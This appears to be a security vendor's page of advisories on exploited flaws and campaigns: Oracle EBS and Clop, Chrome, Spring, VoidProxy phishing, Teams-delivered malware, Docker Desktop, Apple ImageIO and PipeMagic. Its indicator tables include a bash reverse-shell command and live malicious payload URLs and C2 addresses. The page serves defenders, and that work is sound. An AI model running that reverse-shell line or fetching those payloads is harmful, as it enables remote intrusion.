Attackers

Security Advisory

Critical Oracle EBS 0-Day Hit by Clop Ransomware; Oracle Released Emergency Patch 

Summary : Security Advisory: Clop Ransomware aimed at extortion of emails targeting customers of Oracle E-Business Suite. The zero-day vulnerability affected Oracle EBusiness Suite (EBS), specifically the Concurrent Processing component used with BI Publisher Integration and is remotely exploitable without authentication. This allows attackers to execute arbitrary code via HTTP.

OEM Oracle 
Severity Critical 
CVSS Score 9.8 
CVEs CVE-2025-61882 
POC Available Yes 
Actively Exploited Yes 
Advisory Version 1.0 

Overview 

Oracle released an emergency patch and Clop ransomware group actively exploited this flaw in real-world data theft campaigns targeting vulnerable versions using by the organizations.

All EBS versions from 12.2.3 to 12.2.14 are affected and immediate patching requires mitigate the vulnerability. 

                Vulnerability Name CVE ID Product Affected Severity Affected Version 
RCE vulnerability in Oracle E-Business Suite  CVE-2025-61882 Oracle E-Business Suite  Critical 12.2.3 through 12.2.14 

Technical Summary 

The vulnerability allows attackers to gain remote code execution by sending specially crafted HTTP requests to exposed Oracle EBS services. Once exploited, it enables full system compromise, including reverse shell access. The vulnerability has been using by Clop ransomware group in conjunction with other previously known EBS flaws to exfiltrate sensitive data and extort victims. Indicators of compromise (IoCs) such as malicious IPs, shell commands, and exploit files have been published to help organizations detect past intrusions.

Oracle’s fix includes the patch for this flaw but also mitigates additional exploitation paths identified during their internal investigation. 

CVE ID Component Affected  Vulnerability Details Impact 
CVE-2025-61882 BI Publisher Integration A critical unauthenticated RCE in Oracle EBusiness Suite affecting the Concurrent Processing/BI Publisher integration.   Full system compromise, data theft.  

Recommendations 

Users And Administrators should immediately apply the Security Patch for CVE202561882 on all affected Oracle E-Business Suite systems: 

  • Log in to My Oracle Support. 
  • Use the patch availability document & search for the patch specific to CVE-2025-61882 for your OS and Oracle EBS version. 

Prerequisite: Ensure the October 2023 Critical Patch Update (CPU) is already installed. 

Here are some recommendations below 

  • If immediate patching is not possible, restrict HTTP/HTTP/HTTPS access to the EBS application from untrusted networks. 
  • Review server logs, network traffic and system processes to detect signs of exploitation. 
  • Monitor for known Indicators of Compromise (IoCs) provided by Oracle from the table below. 

IOCs 
 

Indicator Type Description 
200[.]107[.]207[.]26 IP Potential GET and POST activity 
185[.]181[.]60[.]11 IP Potential GET and POST activity 
sh -c /bin/bash -i >& /dev/tcp// 0>&1 Command Establish an outbound TCP connection over a specific port 
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip 
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py 
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py 

Source: Oracle 

Conclusion: 
This is the ongoing threat exploitation by the ransomware group, particularly for unpatched Oracle EBS deployments.

As this is being actively exploited in the wild, upgrade to the supported patched version and organizations should also review logs, investigate for signs of compromise using Oracle’s IoCs, and strengthen network access controls around EBS systems. Immediate action is required to reduce the risk of further exploitation, data loss and operational disruption. 

References

Security Advisory

Chrome Security Update Fixed Active Zero-Day Exploit & Multiple High-Severity Vulnerabilities 

Security advisory : Google has issued a Stable Channel Update for Chrome to address 4 high-severity vulnerabilities, including one zero-day vulnerability (CVE-2025-10585) actively exploited in the wild.

OEM Google 
Severity High 
CVSS Score N/A 
CVEs CVE-2025-10585, CVE-2025-10500, CVE-2025-10501, CVE-2025-10502 
POC Available No 
Actively Exploited Yes 
Exploited in Wild Yes 
Advisory Version 1.0 

Overview 

This flaw, a Type Confusion in the V8 JavaScript and WebAssembly engine, can allow remote attackers to execute arbitrary code outside of Chrome’s security sandbox when users visit maliciously crafted web pages. Users and administrators are urged to update to the latest Chrome version immediately to mitigate potential exploitation 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
​ Type Confusion in V8 Engine  CVE-2025-10585 Chrome (Windows, Mac, Linux)  High  140.0.7339.185/.186 

Technical Summary 

The zero-day vulnerability in Chrome’s V8 engine arises from a type of confusion flaw, where object types are misinterpreted, leading to logical errors and memory corruption.

Attackers can exploit this issue when users visit maliciously crafted websites, enabling arbitrary code execution and possible sandbox escape.

This flaw has been confirmed as actively exploited in the wild. In addition to this zero-day, the update also fixes three other high-severity issues, a use-after-free in the Dawn graphics abstraction layer that could lead to memory corruption, a use-after-free in WebRTC that may enable remote code execution, and a heap buffer overflow in ANGLE that could result in program crashes or arbitrary code execution. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-10585 Google Chrome (Windows, Mac, Linux) Type confusion in the V8 JavaScript engine could allow memory corruption, arbitrary code execution, and potential sandbox escape Remote Code Execution / Sandbox Escape 

Other Vulnerabilities  

In addition to the zero-day, Google patched three other high-severity vulnerabilities in the same stable channel release. 

Vulnerability Name CVE ID Affected Component Severity 
​Use-after-free in Dawn CVE-2025-10500 Chrome GPU Renderer Component (Dawn)  High 
Use-after-free in WebRTC CVE-2025-10501 Chrome WebRTC Audio/Video Communication Module High 
Heap Buffer Overflow in ANGLE CVE-2025-10502 Chrome Graphics Translation Engine (ANGLE) High 

Recommendations

Update Chrome immediately to the following versions: 

  • Windows/Mac: Chrome 140.0.7339.185/.186 
  • Linux: Chrome 140.0.7339.185 

Here are some Recommendations below 

  • Manual Update Check: Navigate to “Settings → Help → About Google Chrome” to trigger the update. 
  • Patch Management: Ensure enterprise update policies enforce Chrome auto-updates. 
  • Threat Monitoring: Keep monitoring logs for any signs of exploitation 

Conclusion: 
There are high vulnerabilities in Google Chrome, including an actively exploited zero-day flaw in the V8 JavaScript engine that poses a significant risk of remote code execution and sandbox escape.

Given the severity and confirmed exploitation in the wild, it is imperative that all users and administrators promptly update to the latest Chrome versions to mitigate potential attacks. Immediate action is essential to safeguard systems, data, and user privacy in light of these emerging threats. 

References

  • https://cybersecuritynews.com/google-chrome-0-day-vulnerability-exploited/  

Security Advisory

Spring Security & Framework Authorization Bypass Vulnerabilities Patched 

Security advisory: Two new security vulnerabilities have been discovered in the Spring Framework and Spring Security components identified as CVE-2025-41248 and CVE-2025-41249.

Severity Medium 
CVSS Score 4.4 
CVEs CVE-2025-41248, CVE-2025-41249 
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

These issues affect applications that use method-level security annotations like @PreAuthorize to control access to certain methods or features. Under specific conditions when generics are used in parent classes or interfaces, these annotations may not be properly detected, which could allow unauthorized users to access restricted functionality. 

                Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Spring Security Authorization Bypass Vulnerability  CVE-2025-41248 Spring Security  Medium 6.5.4 (Open Source) 6.4.10 (Open Source)  
Spring Framework Annotation Detection Vulnerability CVE-2025-41249 Spring Framework Medium 6.2.11 (Open Source) 6.1.23 (Commercial Support) 5.3.45 (Commercial Support)  

Technical Summary 

The vulnerability arises when Spring applications use inheritance (where a class inherits methods from another class) and generics (a way to define methods or classes that can handle different types of data) together. If a secured method, like one marked with the @PreAuthorize annotation (used to enforce security checks), is declared in a generic superclass or interface without clear type definitions, Spring might fail to recognize the security annotation at runtime. This means unauthorized users could potentially access these methods. This issue affects Spring Security versions 6.4.0 to 6.5.3 and Spring Framework versions 5.3.0 to 6.2.10. The Spring team has since released updates to better handle security annotations in such cases, ensuring proper authorization checks. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-41248 Spring Security 6.4.0 – 6.4.9 6.5.0 – 6.5.3 Spring Security may fail to detect method-level security annotations applied to generic superclasses or interfaces, resulting in unauthorized access. Unauthorized access  
CVE-2025-41249 Spring Framework 6.2.0 – 6.2.10 6.1.0 – 6.1.22 5.3.0 – 5.3.44 Older, unsupported versions are also affected.  Spring Framework does not consistently recognize security annotations on methods declared in generic superclasses or interfaces, which can lead to authorization bypass. Authorization bypass. 

Remediation

Users should immediately update to the latest patched versions of Spring Security and Spring Framework: 

Spring Security 
Affected Version Fix Version 
6.5.x 6.5.4 
6.4.x 6.4.10 
Spring Framework 
Affected Version Fix Version 
6.2.x 6.2.11 
6.1.x 6.1.23 
6.0.x N/A (OOS) 
5.3.x 5.3.45 

Conclusion: 
These vulnerabilities cause Spring Security and Spring Framework to sometimes miss detecting method-level security annotations in generic type hierarchies. This can allow unauthorized users to bypass authorization checks, exposing protected functionality. While the severity is medium, it is important to update to the fixed versions promptly and review security annotation usage on generics to maintain proper access control. 

References

 

Security Advisory

VoidProxy PhaaS Uses MFA Bypass, Hijacking Google & Microsoft Logins

Security Advisory

Security researchers from Okta have uncovered a stealthy and sophisticated Phishing-as-a-Service (PhaaS) framework known as VoidProxy.

This has been used to hijack Microsoft, Google and even integrated SSO accounts protected by providers like Okta. Unlike traditional phishing kits, VoidProxy employs Adversary-in-the-Middle (AiTM) tactics to capture real-time credentials, MFA tokens and bypassing several standard authentication protections.

VoidProxy’s infrastructure leverages disposable domains, Cloudflare protections, dynamic DNS which all of mimicking as legitimate enterprise setups becoming extremely difficult to detect, analyze. The attackers are running phishing campaigns with little technical effort, enabling wide-scale compromises that lead to email compromise, fraud and data breaches.

Its attack chain is built to evade modern email security, identity defenses, and analysis tools by leveraging the following:

  • CAPTCHA Filtering: Victims are first shown a CAPTCHA challenge before any phishing content loads. This helps block bots and automated security scanners.
  • Cloudflare Workers: Used to deliver customized phishing pages and smartly direct traffic to the attacker’s backend servers.
  • URL Redirection Chains: The phishing links in emails go through several redirects (often using shortened URLs) before landing on fake login pages. This helps bypass spam filters and security tools.
  • Dynamic DNS: These services let attackers quickly create domain names that point to specific IP addresses, making their infrastructure flexible and harder to track.    

Once a user enters their credentials and MFA tokens, the session is hijacked via a reverse proxy server, allowing the attacker to immediately access the legitimate account.

Here are some shortened url links

Attack Flow

StepDescription
1. DeliveryPhishing emails are sent from compromised accounts on email delivery services (like Postmarkapp or Constant Contact) increasing trust and shortening URL services for bypassing spam filters.
2. Redirecting & FilterClicking the phishing link redirects victims through several short URLs and presents a Cloudflare captcha to ensure human interaction.
3. PhishingVictims land on a fake Microsoft or Google login page using realistic subdomain patterns like “login.<phishing_domain>.<.com/.io>”. Additionally, integrated SSO accounts are redirected to additional fake SSO pages mimicking the login flows.
4. AiTM Session HijackThe backend proxy captures credentials, MFA tokens and session cookies, allowing attackers full account access.
5. ExfiltrationSession cookies and credentials are routed to the attacker’s admin panel in real-time. Integration with bots or webhooks enables instant alerts to the attackers.

Why It’s Effective

AiTM Infrastructure: Unlike static phishing kits, VoidProxy runs a live proxy in the middle of the authentication flow, stealing session tokens or mfa token immediately after login.

CAPTCHA & Cloudflare Layers: These challenges ensure only real human victims reach the phishing payload, filtering out scanners and sandboxes.

Integrated SSO Targeting: Accounts using Okta or other SSO providers are redirected to accurate second-stage phishing pages, increasing the likelihood of a full compromise.

Recommendations:

Here are some recommendations below

  • Harden the authentication by bind sessions to IP addresses (IP Session Binding) to block cookie replay attacks.
  • Block access from rarely used IP ranges or unmanaged devices.
  • Provide user awareness training to help recognize phishing links, suspicious email senders and fake login prompts.
  • Keep monitoring for any indications of suspicious activities.

Conclusion
VoidProxy’s layered architecture, real-time session hijacking and deep evasion mechanisms make it a potential threat even for environments with multi-factor authentication in place. We require a shift from traditional phishing detection toward real-time risk-based access controls, strong authenticators and persistent user education.

References:

Security Advisory

Vulnerability in Spring Cloud Gateway Server WebFlux Discovered; Target of Ease by Attackers

Security Advisory: CVE-2025-41243, A critical vulnerability has been disclosed in Spring Cloud Gateway Server WebFlux. This vulnerability allows attackers to modify sensitive Spring Environment properties under specific configurations.

Severity Critical 
CVSS Score 10.0 
CVEs CVE-2025-41243 
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

The vulnerability has been assigned the maximum CVSS score of 10.0. It arises when actuator endpoints are exposed without proper security controls, potentially allowing attackers to compromise application behavior. Organizations and users of affected versions are strongly urged to upgrade to the fixed releases. 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Spring Expression Language Property Modification  CVE-2025-41243  Spring Cloud Gateway WebFlux  Critical   v4.3.1,  
v4.2.5, v4.1.11, v3.1.11  

Technical Summary 

CVE-2025-41243 is a critical vulnerability occurs when the Spring Boot actuator is included as a dependency and the gateway actuator endpoint is explicitly exposed via the “management.endpoints.web.exposure.include=gateway” configuration.

In such cases, if actuator endpoints are unsecured or exposed to public networks, an attacker could exploit them to modify Spring Environment properties at runtime. This could cause unauthorized access, configuration tampering, and potential application compromise. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-41243    4.3.0 – 4.3.x 4.2.0 – 4.2.x 4.1.0 – 4.1.x 4.0.0 – 4.0.x 3.1.0 – 3.1.x Older, unsupported versions   Improperly secured actuator endpoints in Spring Cloud Gateway WebFlux allow unauthorized modification of Spring Environment properties. Unauthorized access potential privilege escalation 

Remediation – 

Upgrade Immediately patch to fixed versions: 

Affected Version Range Upgrade To 
4.3.x 4.3.1 
4.2.x 4.2.5 
4.1.x and 4.0.x 4.1.11 
3.1.x 3.1.11 
Unsupported versions Migrate to a supported release 

If you are unable to upgrade right now, here are the recommendations below 

  • Remove gateway from the “management.endpoints.web.exposure.include” property or secure the actuator endpoints. 
  • Secure actuator endpoints with proper authentication and access controls. 
  • Regularly audit and harden application configuration files. 
  • Monitor application and network logs for suspicious activity or unauthorized access attempts. 
  • Implement firewall rules or reverse proxies to restrict access to sensitive endpoints. 
  • Ensure all systems follow patch management and update policies. 

Conclusion 
CVE-2025-41243 is a critical vulnerability affecting Spring Cloud Gateway WebFlux, allowing remote attackers to modify environment properties when actuator endpoints are misconfigured and exposed.

While no active exploitation has been observed in the wild, vulnerability poses a high risk to application integrity and security due to its CVSS score of 10.0 and ease of exploitation in exposed systems.

Organizations are strongly advised to upgrade to the fixed versions, secure actuator endpoints, and follow best practices to reduce attack surface and prevent future exploitation. 

References 

Security Advisory

Threat Actors Exploiting Microsoft Teams to Gain Remote Access & Transfer Malware 

Security Advisory:

A new wave of social engineering attacks is exploiting Microsoft Teams, one of the most trusted enterprise collaboration platforms as a malware delivery channel.

Threat actors are impersonating IT support staff to trick employees into installing remote access tools and running malicious PowerShell scripts, enabling full compromise of victim environments. 

This campaign represents an evolution beyond traditional phishing, weaponizing corporate communication channels that employees inherently trust. Once access is established, attackers deploy multifunctional malware loaders such as DarkGate and Matanbuchus, with capabilities for credential theft, persistence, lateral movement and ransomware deployment. 

Technical Summary 

Security researchers have observed financially motivated threat groups abusing Microsoft Teams chats and calls to impersonate IT administrators. Attackers create malicious or compromised Teams accounts often using convincing display names like “IT SUPPORT ” or “Help Desk Specialist” as looking like legitimate and verified account to initiate direct conversations with employees. The social engineering process typically follows this chain 

Attack Process                                                                             Source: permiso.io 

It included the malware features 

  • Credential theft via GUI-based Windows prompts. 
  • Persistence using Scheduled Tasks (e.g. Google LLC Updater) or Registry Run keys. 
  • Encrypted C2 communications with hardcoded AES keys & IVs. 
  • Process protection via RtlSetProcessIsCritical, making malware harder to remove. 
  • Harvesting system info for reconnaissance and follow-on payloads. 

The campaigns have been linked to threat actor groups such as Water Gamayun (aka EncryptHub), known for blending social engineering, custom malware and ransomware operations. 

Element Detail 
Initial Access Direct messages/calls via Microsoft Teams impersonating IT staff 
Social Engineering Fake IT accounts with display names like “IT SUPPORT ✅” and onmicrosoft.com domains 
Malicious Tools QuickAssist, AnyDesk, PowerShell-based loaders (DarkGate, Matanbuchus) 
Persistence Scheduled Tasks (Google LLC Updater), Registry autoruns 
Payload Features Credential theft, system profiling, encrypted C2, remote execution 
Target Enterprise employees, IT professionals, developers 
Objective Credential theft, long-term access, ransomware deployment 

IOCs 

Organizations are urged to block the following indicators immediately: 

Indicator Type 
https://audiorealteak[.]com/payload/build.ps1 URL 
https://cjhsbam[.]com/payload/runner.ps1 URL 
104.21.40[.]219 IPv4 
193.5.65[.]199 IPv4 
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6 UA 
&9*zS7LY%ZN1thfI Initialization Vector 
123456789012345678901234r0hollah Encryption Key 
62088a7b-ae9f-2333-77a-6e9c921cb48e Mutex 
Help Desk Specialist  User Display Name 
IT SUPPORT User Display Name 
Marco DaSilva IT Support  User Display Name 
IT SUPPORT  User Display Name 
Help Desk User Display Name 
@cybersecurityadm.onmicrosoft.com User Principal Name 
@updateteamis.onmicrosoft.com User Principal Name 
@supportbotit.onmicrosoft.com User Principal Name 
@replysupport.onmicrosoft.com User Principal Name 
@administratoritdep.onmicrosoft.com User Principal Name 
@luxadmln.onmicrosoft.com User Principal Name 
@firewalloverview.onmicrosoft.com User Principal Name 

Remediation

  1. Strengthen Microsoft Teams Security 
  • Restrict external tenants and enforce strict access control on Teams. 
  • Implement anomaly detection for suspicious Teams account activity. 
  • Block installation of unauthorized remote access tools (QuickAssist, AnyDesk). 

2. Enhance Endpoint & Network Defenses 

  • Monitor PowerShell execution with EDR/XDR solutions. 
  • Detect persistence artifacts (scheduled tasks, autorun keys, rundll32 activity). 
  • Block known IoCs at DNS/firewall levels. 

 3. Employee Awareness & MFA Security 

  • Train employees to verify IT support requests through independent channels. 
  • Warn staff against installing software via unsolicited Teams messages. 
  • Enforce multi-factor authentication (MFA) for all accounts. 

Conclusion: 
By shifting malware delivery into Microsoft Teams, attackers are exploiting a platform that enterprises inherently trust. The blending of social engineering with technical abuse of PowerShell and remote access tools makes this campaign particularly dangerous, enabling attackers to infiltrate organizations without relying on traditional email phishing. 

Organizations must treat collaboration platforms as high-value attack surfaces not just communication tools. Strengthening monitoring, restricting external interactions and training employees to validate IT requests are critical to defending against this evolving threat.  

References

Security Advisory

Critical Chrome Use-After-Free Vulnerability in ANGLE Graphics Library 

Security Advisory: A critical use-after-free vulnerability has been identified in the ANGLE graphics library used by Google Chrome which enables applications designed for OpenGL ES (OpenGL used on mobile and embedded devices) or WebGL (a web-based 3D graphics API) to run on platforms that primarily use other graphics APIs, such as DirectX on Windows or Vulkan on Android.

OEM Google Chrome 
Severity High 
CVSS Score 8.8 
CVEs CVE-2025-9478 
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

This vulnerability could allow attackers to take control of your device simply by visiting a harmful website using HTML or WebGL which is just opening the wrong page could let hackers run their own code on our system. 

Google has already fixed this problem in the latest Chrome update (version 139.0.7258.154/.155 for Windows & macOS and 139.0.7258.154 for Linux). Users and administrators are strongly advised to apply the latest updates immediately. 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
​ Use-After-Free Vulnerability in ANGLE  CVE-2025- 9478 Google Chrome  High  v139.0.7258.154/.155 (Win/Mac), v139.0.7258.154 (Linux) 

Technical Summary 

This security issue happens when Chrome accidentally reuses computer memory that should no longer be in use. This is exploited by the attacker, if we visit a harmful website designed by cybercriminals, it can secretly run special graphics commands (through WebGL or Canvas). This could corrupt our system’s memory, crash our browser, or allow hackers to run their own code on our device remotely. 

CVE ID System Affected  Vulnerability Details Impact 
 CVE-2025- 9478 Chrome < 139.0.7258.154 A Vulnerability in Chrome’s graphics engine lets attackers reuse cleared memory through specially designed HTML/WebGL input. Remote code execution,  
Data theft  
 

Remediation

  • Update to Chrome latest versions 139.0.7258.154/.155 on Windows/macOS or 139.0.7258.154 on Linux or the later one. 

Here are some recommendations below 

  • Keep monitoring the logs for suspicious activities unusual WebGL or graphics API call. 
  • Conduct user awareness training to educate users about the risks of malicious websites, avoiding unknown links. 

Conclusion: 
This is a high-severity Chrome vulnerability that could allow remote code execution via malicious WebGL content. Although not yet exploited in the wild but immediate patching is essential. Users should update Chrome, monitor unusual graphics activity and stay informed about malicious website risks to ensure strong browser security. 

References

Security Advisory

Docker Desktop Vulnerability Allows Full Host Compromise via Exposed API 

A critical vulnerability has been discovered in Docker Desktop for Windows, macOS and Linux distributions.

The vulnerability allows malicious containers to gain full access to the host system by misusing an exposed Docker Engine API endpoint.

Docker Desktop

Docker a must to have in modern enterprise infrastructure, as a strong foundation pillar that powers cloud-native applications including CI/CD pipelines and microservices at massive scale. Any vulnerabilities in Docker images and runtimes are particularly dangerous as they can open the door to severe supply-chain attacks, container escapes, data leaks, and even full host compromise. 

OEM Docker 
Severity Critical 
CVSS Score 9.3 
CVEs CVE-2025-9074 
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

The vulnerability, considered as CVE-2025-9074, which affects Docker Desktop versions prior to 4.44.3. This exploitation requires no special configuration and can be triggered with minimal interaction. Docker has addressed this issue in version 4.44.3, administrator or user are suggested to upgrade to the latest version. 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Docker Engine API Exposure / Container Escape  CVE-2025-9074 Docker Desktop 
(Windows, macOS, Linux) 		 Critical  v4.44.3 

Technical Summary 

The vulnerability comes from Docker Desktop’s internal API endpoint (http://192.168.65.7:2375) being accessible from any container running locally. The endpoint with lack of authentication allows privileged API commands such as creating new containers, mounting host directories, and controlling images. 

On Windows with WSL, this becomes riskier because attackers could mount your C: drive with the same rights, giving them full access to the machine. With the safety settings like Enhanced Container Isolation (ECI) or disabling TCP exposure, don’t fully block this problem. 

CVE ID System Affected  Vulnerability Details Impact 
 CVE-2025-9074  v4.25 before v4.44.3  An internal HTTP API is automatically open to containers on the default network. This could allow us to run powerful commands – creating containers, managing images or accessing the host system  Full host compromise, including file system and resource access 

Remediation

  • Upgrade to Docker Desktop version 4.44.3 or later across all supported platforms. 

Recommendations: 

Here are some recommendations below  

  • Don’t depend only on container isolation, treat development tools as part of the security perimeter. 
  • Use network segmentation and zero-trust controls to protect container workloads. 
  • Monitor container traffic for unauthorized API access attempts. 
  • Apply strict IAM rules and give users only the permissions they really need on Docker hosts. 

Conclusion: 
CVE-2025-9074 is a critical container escape vulnerability exposing host systems to complete compromise. While no active exploitation has been reported, the weakness is easy to exploit. Immediate patching and environment hardening are strongly recommended for all Docker Desktop users. 

References: 

Security Advisory

Apple Patches Zero-Day Vulnerability Exploited in Targeted Attacks (CVE-2025-43300) 

Security Advisory : Apple has released critical security patches to address a newly discovered zero-day vulnerability, CVE-2025-43300, that was found to be actively exploited in targeted attacks.

To protect users, Apple has issued patches in iOS 18.6.2, iPadOS 18.6.2, iPadOS 17.7.10 and the latest macOS versions.

OEM Apple 
Severity High 
CVSS Score 8.8 
CVEs CVE-2025-43300 
POC Available No 
Actively Exploited Yes 
Exploited in Wild Yes 
Advisory Version 1.0 

Overview  The vulnerability resides in Apple’s ImageIO framework, which is used for handling image files across iOS, iPadOS, and macOS platforms. According to Apple, the flaw may have been used in sophisticated, targeted attacks, although exact details have not been disclosed.

The vulnerability affects a wide range of devices, including iPhones starting from the XS, multiple iPad models and Macs running macOS Ventura, Sonoma and Sequoia. This marks the seventh zero-day exploited in the wild that Apple has addressed in 2025, underscoring the increasing frequency and severity of threats targeting Apple users. 

                Vulnerability Name CVE ID Product Affected Severity Fixed Version 
An out-of-bounds write issue   CVE-2025-43300 iPhone, iPad, macOS  High iOS 18.6.2, iPadOS 18.6.2, iPadOS 17.7.10, macOS 13.7.8, macOS 14.7.8, macOS 15.6.1 

Technical Summary 

The vulnerability, CVE-2025-43300, is classified as an out-of-bounds write issue within the ImageIO framework.

It can be exploited when a specially crafted image file is processed, causing memory corruption that could allow an attacker to execute arbitrary code on the affected device.

This makes it a critical security flaw, particularly because the attack vector image files are common and often considered low risk. Apple has mitigated vulnerability by improving bounds by checking in the affected code.

The exploitation of this bug in the wild indicates a high level of sophistication, likely by advanced persistent threat actors targeting specific individuals. The technical nature of the bug aligns with a broader trend in which attackers exploit flaws in media-handling components to achieve remote code execution. As such, this patch not only fixes a critical issue but also highlights the need for continued vigilance and timely system updates. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-43300 iPhones, iPads, Macs. Critical out-of-bounds write vulnerability in Apple’s ImageIO framework that allows remote code execution by processing a malicious image. It has been actively exploited in highly targeted attacks on iOS, iPadOS, and macOS devices, prompting urgent patches.  Remote code execution via malicious image zero-click attack surface 

Apple has so far fixed a total of seven zero-day vulnerabilities in 2025 that were actively exploited in real-world attacks, including CVE-2025-43300, reflecting an ongoing effort to patch critical security flaws across iOS, iPadOS, and macOS platforms. 

  • CVE-2025-24085: A memory corruption flaw in WebKit that could allow remote code execution via malicious web content. 
  • CVE-2025-24200: An elevation of privilege vulnerability in the kernel, enabling attackers to gain higher system privileges. 
  • CVE-2025-2420: A logic issue in the kernel that could lead to arbitrary code execution by a malicious app. 
  • CVE-2025-31200: A vulnerability in the CoreGraphics framework allowing remote code execution when processing malicious PDF files. 
  • CVE-2025-31201: An issue in the IOMobileFrameBuffer kernel extension that could permit a local attacker to escalate privileges. 
  • CVE-2025-43200: A flaw in the AppleAVD driver leading to a potential kernel privilege escalation. 
  • CVE-2025-43300: An out-of-bounds write vulnerability in the ImageIO framework actively exploited through malicious images, enabling remote code execution. 

Remediation

Update your Apple devices immediately to the latest patched versions: 

  • iPhone – iOS 18.6.2 
  • iPad – iPadOS 18.6.2/17.7.10 
  • macOS – macOS Ventura 13.7.8, Sonoma 14.7.8 or Sequoia 15.6.1. 

Conclusion: 
Apple has urgently patched seven critical zero-day vulnerabilities in 2025, including CVE-2025-43300, that were actively exploited in targeted attacks.

Users are strongly advised to update their devices immediately to stay protected against these serious threats. 

In addition, CISA has added CVE-2025-43300 to its Known Exploited Vulnerabilities (KEV) Catalog under BOD 22-01, requiring federal agencies to remediate the flaw within specified timelines.

While the directive is mandatory for federal agencies, CISA strongly urges all organizations to prioritize remediation of KEV-listed vulnerabilities to reduce their exposure to active threats. 

References

Blogs

Fake ChatGPT Desktop App used to deliver PipeMagic Malware

Microsoft finds that a fake ChatGPT Desktop App Delivering PipeMagic Backdoor,a part of sophisticated malware framework. The PipeMagic campaign represents a dangerous evolution in the global cybercrime landscape. The malicious campaign, powered by a new backdoor called PipeMagic, targets multiple industries including IT, finance, and real estate. The PipeMagic attack is centered around CVE-2025-29824, a critical Windows Common Log File System (CLFS) vulnerability

The PipeMagic campaign a malware to technical threat exploiting trust globally

As per Microsoft cybercriminals are disguising malware as widely popular ChatGPT Desktop Application to launch ransomware attacks across the globe.  

PipeMagic’s evolution from malware to technical threat exploiting trust globally

The malware allows hackers to escalate privileges once inside a system, by leveraging the immense popularity of ChatGPT, attackers have successfully weaponized user trust.

Microsoft has linked the operation to Storm-2460, a financially motivated cybercrime group known for deploying ransomware through stealthy backdoors.

PipeMagic is a malware first detected in December 2022 while investigating a malicious campaign involving RansomExx. The victims were industrial companies in Southeast Asia. To penetrate the infrastructure, the attackers exploited the CVE-2017-0144 vulnerability.

The backdoor’s loader was a trojanized version of Rufus, a utility for formatting USB drives. PipeMagic supported two modes of operation – as a full-fledged backdoor providing remote access, and as a network gateway – and enabled the execution of a wide range of commands.

Pipemagic’s technique of attack

PipeMagic also reflects a growing trend where attackers combine fileless malware techniques with modular frameworks.

By running directly in memory, it avoids detection from traditional signature-based tools. The modular design means it can expand its functionality much like commercial software — essentially transforming cybercrime into a scalable business model.

Another key point is the use of cloud infrastructure for command-and-control. By hosting their servers on Azure, the hackers blend into normal enterprise traffic, making malicious communications far less suspicious. This tactic underscores the need for behavioral monitoring instead of relying solely on blacklists.

Microsoft attributes PipeMagic to a financially motivated group known as Storm-2460. This is a warning sign for future attacks in the broader cybersecurity landscape.

PipeMagic’s modus operandi could be an inspiration for future malware families and its modular framework could fuel a wave of ransomware-as-a-service operations. That possibility raises the stakes not just for enterprises but also for small businesses and even government institutions.

The first stage of the PipeMagic infection execution begins with a malicious in-memory dropper disguised as the open-source for chat GPT application project. The threat actor uses a modified version of the GitHub project that includes malicious code to decrypt and launch an embedded payload in memory.

The embedded payload is the PipeMagic malware, a modular backdoor that communicates with its C2 server over TCP. Once active, PipeMagic receives payload modules through a named pipe and its C2 server.

The malware self-updates by storing these modules in memory using a series of doubly linked lists.

These lists serve distinct purposes for staging, execution, and communication, enabling the threat actor to interact and manage capabilities of backdoor throughout its lifecycle.

By offloading network communication and backdoor tasks to discrete modules, PipeMagic maintains a modular, stealthy, and highly extensible architecture, making detection and analysis significantly challenging.

Microsoft Threat Intelligence encountered PipeMagic as part of research on an attack chain involving the exploitation of CVE-2025-29824, an elevation of privilege vulnerability in Windows Common Log File System (CLFS).

Scroll to top